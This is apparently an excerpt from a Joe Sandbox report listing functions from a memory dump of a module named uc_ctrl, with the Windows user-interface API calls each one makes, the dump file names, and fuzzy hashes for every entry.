Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: FileInfo$Exception@8FromH_prolog3_ListPathThrow
String ID:
API String ID: 1236858919-0
Opcode ID: 6083a22b7a8597078b62ab465bd007846e5a3a689eae48243932e1c4e0c9d245
Instruction ID: 827dc1f14afa6d84379522928d127800a9ff3897a00e7414c31fc99bfe48ec75
Opcode Fuzzy Hash: 6083a22b7a8597078b62ab465bd007846e5a3a689eae48243932e1c4e0c9d245
Instruction Fuzzy Hash: 3641D1B0A051699BDF208F24CC84BEEBB78FF04308F0041A9E50DA7A55DB30EA55DF96

Function 6CB3ABAF Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6CB3ABD8
GetClientRect.USER32(?,?), ref: 6CB3AC1F
GetWindowRect.USER32(?,?), ref: 6CB3AC65
GetSystemMetrics.USER32(00000007), ref: 6CB3AC79

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$ClientMetricsParentSystemWindow
String ID:
API String ID: 2120119201-0
Opcode ID: c260988167075585f3529aa6b6709c0be42a1705806735b58c33542c52a6c1c2
Instruction ID: e8a688ed395454fa6cb5e5cb80ebf7958d08c80a1fa1609a3de3d424b2f38b75
Opcode Fuzzy Hash: c260988167075585f3529aa6b6709c0be42a1705806735b58c33542c52a6c1c2
Instruction Fuzzy Hash: 1F3108B1D01219AFCF01DFA8D9849EEBBF5FF49314B10456AE909EB200EB35A904CF54

Function 6CB335B4 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(00000000), ref: 6CB335BF
GetClientRect.USER32(?,00000000), ref: 6CB335DF
GetParent.USER32(?), ref: 6CB335FE
OffsetRect.USER32(00000000,00000000,00000000), ref: 6CB33682

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$ClientEmptyOffsetParent
String ID:
API String ID: 3819956977-0
Opcode ID: fdb9c49e48f92c34af111e8e2c778eb92fefc525403abc5c27a0bd54e8bdd38d
Instruction ID: 9aa8afae3f84baa4213902cefe1682b0a408845b3f1381e966a0a9aff8d9b671
Opcode Fuzzy Hash: fdb9c49e48f92c34af111e8e2c778eb92fefc525403abc5c27a0bd54e8bdd38d
Instruction Fuzzy Hash: 68319272305552AFDB04CF65C894D7BBBA4FF45324710821EE81D8BB90EB34E811CB94

Function 6CBCDB8B Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6CBCDBDF
IsRectEmpty.USER32(?), ref: 6CBCDBE9
SetRectEmpty.USER32(?), ref: 6CBCDC3D
SetRectEmpty.USER32(?), ref: 6CBCDC47

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: baa60cc39f53ba58f0cfadf62cd5b4762f844c85e66d51607388280497fe802a
Instruction ID: 21ed8c6e9f33c8e83af1c8188ef7e12109752e3dd98958fa85dfc3ad506312d4
Opcode Fuzzy Hash: baa60cc39f53ba58f0cfadf62cd5b4762f844c85e66d51607388280497fe802a
Instruction Fuzzy Hash: D031DE75B022099BCF04CFA4D484BEF7BB8EF09719F50409AE900AB684D7B1D945CBA2

Function 6CB47369 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000001), ref: 6CB4738A
ScreenToClient.USER32(?,00000001), ref: 6CB47397
SetCursor.USER32(?), ref: 6CB473C8
PtInRect.USER32(?,00000001,?), ref: 6CB47439

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Cursor$ClientRectScreen
String ID:
API String ID: 2390797981-0
Opcode ID: 9090a75c991c90fef00ded8f3570215c720d48511ba7aa23fd3692bad1697621
Instruction ID: 90ed0abbfd2e4908ca54295288eee9fe549a8329f36dad1fbdf6ea655862432f
Opcode Fuzzy Hash: 9090a75c991c90fef00ded8f3570215c720d48511ba7aa23fd3692bad1697621
Instruction Fuzzy Hash: C231E132A04956EFCF05DFB4C888CAEBF79FF05208F0081A9E915A7A14DB70AA55DB51

Function 6CB549BD Relevance: 6.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 6CB549EA
GetParent.USER32(?), ref: 6CB549F3

Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2618D
Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2619A

OffsetRect.USER32(?,00000000,?), ref: 6CB54A34
OffsetRect.USER32(?,?,00000000), ref: 6CB54A44

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$ClientOffsetScreen$ParentWindow
String ID:
API String ID: 182828750-0
Opcode ID: 6eae23c63489c41b8b805e14582646a0f7b42ec4d33e35c826d0927e485b5c55
Instruction ID: f14de17e0c0cbaf682ba21a3d6b05b7938507cfaaa11991db405327eea68d263
Opcode Fuzzy Hash: 6eae23c63489c41b8b805e14582646a0f7b42ec4d33e35c826d0927e485b5c55
Instruction Fuzzy Hash: 5F216D72A01119AFDF00DFE8CD849FFBBBDEB49314B50452AE505E3650DA34AA24CBA5

Function 6CB1A173 Relevance: 6.1, APIs: 4, Instructions: 83threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB1A17D

Part of subcall function 6CB1C3FC: __EH_prolog3.LIBCMT ref: 6CB1C403

GetCurrentThread.KERNEL32 ref: 6CB1A1DA
GetCurrentThreadId.KERNEL32 ref: 6CB1A1E3
GetVersionExW.KERNEL32 ref: 6CB1A27F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CurrentThread$H_prolog3H_prolog3_Version
String ID:
API String ID: 786120064-0
Opcode ID: 7415be4b28b4f1a98b8441d6753d1a42bace60936e9f67cdbd374de08e2bdeb8
Instruction ID: 327aac28eb1a1b371fd3bdd4692708b943bfddb5c843e935f5c8d8097bb9c9cf
Opcode Fuzzy Hash: 7415be4b28b4f1a98b8441d6753d1a42bace60936e9f67cdbd374de08e2bdeb8
Instruction Fuzzy Hash: 1E41D9B0945B408FD7218F2A898478AFBF0FF49704F908A6EC5AE83B10DB70A559CF41

Function 6CB3EF83 Relevance: 6.1, APIs: 4, Instructions: 76windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB3EF8A
GetSystemPaletteEntries.GDI32(?,00000000,00000100,00000004), ref: 6CB3F000
CreatePalette.GDI32(00000000), ref: 6CB3F04D

Part of subcall function 6CB3E71C: GetObjectW.GDI32(?,00000002,?), ref: 6CB3E729

GetPaletteEntries.GDI32(00000000,00000000,00000000,00000004), ref: 6CB3F034

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Palette$Entries$CreateH_prolog3ObjectSystem
String ID:
API String ID: 374951733-0
Opcode ID: 58347731bc71bdf98f5b77d7aedb07f25fa0dcabb5209d6e3421f9ae875bf4c8
Instruction ID: c062b9c2496dc3b0b5a3ae02ec60493a29fd8cd0fffedc910a3e7c2fd9f03136
Opcode Fuzzy Hash: 58347731bc71bdf98f5b77d7aedb07f25fa0dcabb5209d6e3421f9ae875bf4c8
Instruction Fuzzy Hash: FA21D372600251AFEB159F64C859BEE7BB4FF04314F148019E4099BB90EF74ED08CBA5

Function 6CC5A202 Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2514f9b76046cf26c5ce8d15c4fce7c4eaa8e5f821dfcf514f96ca206ff3fc7
Instruction ID: 77fb61d4718f742a0dd353479822b92041f8925e50a1bf17e3d73a42569b2723
Opcode Fuzzy Hash: b2514f9b76046cf26c5ce8d15c4fce7c4eaa8e5f821dfcf514f96ca206ff3fc7
Instruction Fuzzy Hash: A8112B31604205BBDB205A678C06B6B7B7CEBC3768F910224E915D7680FB7388308779

Function 6CB2AB38 Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6CB2AB70
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6CB2AB9A
GetCapture.USER32 ref: 6CB2ABB0
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6CB2ABBF

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$CaptureException@8Throw
String ID:
API String ID: 1331319163-0
Opcode ID: c1014db9cb66a63eb01c273469681524f42d39c7113d8c1523120e36fa886be5
Instruction ID: 6d5da31bbfbeae05078fe41ebe65b8669ed9d29ad665be0d2e0716e52b5f063e
Opcode Fuzzy Hash: c1014db9cb66a63eb01c273469681524f42d39c7113d8c1523120e36fa886be5
Instruction Fuzzy Hash: 451182713016097FEB111B64CC8DFBF3B6FFB49798F040024B6195BAA1DB658C119660

Function 6CB33B39 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

BeginDeferWindowPos.USER32(00000000), ref: 6CB33B5B
IsWindow.USER32(?), ref: 6CB33B76
DeferWindowPos.USER32(00000000,?,00000000,?,00000000,?,00000000,00000000), ref: 6CB33BC6
EndDeferWindowPos.USER32(00000000), ref: 6CB33BD1

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Defer$Begin
String ID:
API String ID: 2880567340-0
Opcode ID: 860cdd93402435e7604f7c7df1b9a4d25ded33dc0efeddac03eaa7700f59b4f2
Instruction ID: 88b0262156cc42aec771f9dd2b9ab662f71a8ff511285d94f0b7e7e6dfc73b3d
Opcode Fuzzy Hash: 860cdd93402435e7604f7c7df1b9a4d25ded33dc0efeddac03eaa7700f59b4f2
Instruction Fuzzy Hash: 22211A71E0121AAFCB01CFE9C944AAFBBF8EB09710F14156AE505E3650E735A951CBA1

Function 6CB508F9 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6CB50947
GetWindowRect.USER32(?,?), ref: 6CB50968
PtInRect.USER32(?,?,?), ref: 6CB50978
CallNextHookEx.USER32(?,?,?), ref: 6CB509A1

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$CallCursorHookNextWindow
String ID:
API String ID: 3719484595-0
Opcode ID: 2862fcf64ee5fa5b501169f77f1a1f8eb73ce535012f7a525426e3acf6efa004
Instruction ID: d75fb8956d424c3f8dd84c4b2ceb5c2e8c578001c4005d348162446538ca7b2e
Opcode Fuzzy Hash: 2862fcf64ee5fa5b501169f77f1a1f8eb73ce535012f7a525426e3acf6efa004
Instruction Fuzzy Hash: 2A214CB2A0118AABDF018FA9D908DEEFFF8FF49308F504119E514A3614C7319621CF92

Function 6CB36880 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,00000000,00000005,?,?,00000000,00000000,?,6CB35720,?,?,?,?,?), ref: 6CB368A2
LoadResource.KERNEL32(?,00000000,?,?,00000000,00000000,?,6CB35720,?,?,?,?,?), ref: 6CB368B7
LockResource.KERNEL32(00000000,?,?,00000000,00000000,?,6CB35720,?,?,?,?,?), ref: 6CB368C9
GlobalFree.KERNEL32(?), ref: 6CB36908

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Resource$FindFreeGlobalLoadLock
String ID:
API String ID: 3898064442-0
Opcode ID: 604c32384b828ac9e15f68f5a3cfca6b6c803cc4ca193c503ac0c5c57b639a44
Instruction ID: 7610b54bdbe5a380c535cff8225f609ff0037256824a9cd9dc39e3ffe69a6ee7
Opcode Fuzzy Hash: 604c32384b828ac9e15f68f5a3cfca6b6c803cc4ca193c503ac0c5c57b639a44
Instruction Fuzzy Hash: F811E4351006519FC7018B55C884BAABBF5FF8A21AF25906DE94EC3B10DFB1D8099B21

Function 6CB3B6D3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 6CB3B701
GetDC.USER32(00000000), ref: 6CB3B729
EnumFontFamiliesExW.GDI32(00000000,?,6CB3B6BD,?,00000000,?,?,?,?,?,?,00000000), ref: 6CB3B744
ReleaseDC.USER32(00000000,00000000), ref: 6CB3B74C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: EnumFamiliesFontRelease_wcslen
String ID:
API String ID: 3785621066-0
Opcode ID: abe4d6327fe288abf7c8d8da030aabf636beb6efbbfa5062148cf37526a9a8d9
Instruction ID: 70d1aab5f6b9905cbf8b7c19c654d783bf56b5045c6857ffff6ef81f545fd7af
Opcode Fuzzy Hash: abe4d6327fe288abf7c8d8da030aabf636beb6efbbfa5062148cf37526a9a8d9
Instruction Fuzzy Hash: 1111C672E02658ABDB11DBA48D48DEF7BBCEF86714F50001AED05EB704EB309A19C791

Function 6CB38DF0 Relevance: 6.1, APIs: 4, Instructions: 61windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB2D5A5: GetDlgItem.USER32(?,?), ref: 6CB2D5B6

GetWindowLongW.USER32(?,000000F0), ref: 6CB38E0C
GetWindowTextLengthW.USER32(?), ref: 6CB38E39
GetWindowTextW.USER32(?,00000000,00000100), ref: 6CB38E69
SendMessageW.USER32(?,0000014D,000000FF,?), ref: 6CB38E89

Part of subcall function 6CB22163: _wcslen.LIBCMT ref: 6CB22188
Part of subcall function 6CB22163: GetWindowTextW.USER32(?,?,00000100), ref: 6CB221B9
Part of subcall function 6CB22163: lstrcmpW.KERNEL32(?,?), ref: 6CB221CB
Part of subcall function 6CB22163: SetWindowTextW.USER32(?,?), ref: 6CB221D7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
